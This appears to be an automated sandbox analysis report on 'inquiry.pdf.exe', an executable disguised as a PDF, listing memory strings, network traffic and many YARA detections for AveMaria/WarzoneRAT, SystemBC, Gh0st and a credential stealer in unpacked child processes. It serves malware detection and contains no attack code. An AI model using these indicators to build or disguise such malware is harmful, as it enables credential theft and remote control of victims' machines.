Source: inquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/vad
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261663692.0000000006548000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: inquiry.pdf.exe, 00000000.00000003.261927166.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cno.
Source: inquiry.pdf.exe, 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
Source: inquiry.pdf.exe, 00000000.00000002.315753270.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.519656247.0000000002B51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: inquiry.pdf.exe, 00000000.00000002.315753270.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.519656247.0000000002B51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: unknown DNS traffic detected: queries for: www.google.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 142.250.203.100:443 -> 192.168.2.3:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.100:443 -> 192.168.2.3:49705 version: TLS 1.2
Source: inquiry.pdf.exe, 00000000.00000002.313574266.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: inquiry.pdf.exe, 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: GetRawInputData

E-Banking Fraud

Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.3.AddInProcess32.exe.ea71c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.3.AddInProcess32.exe.ea71c8.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.3.AddInProcess32.exe.e95278.8.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.3.AddInProcess32.exe.e95278.8.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.3.AddInProcess32.exe.ea6d50.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.3.AddInProcess32.exe.ea6d50.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.3.AddInProcess32.exe.e95278.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.3.AddInProcess32.exe.e95278.4.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.3.AddInProcess32.exe.e95278.4.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: initial sample Static PE information: Filename: inquiry.pdf.exe
Source: inquiry.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
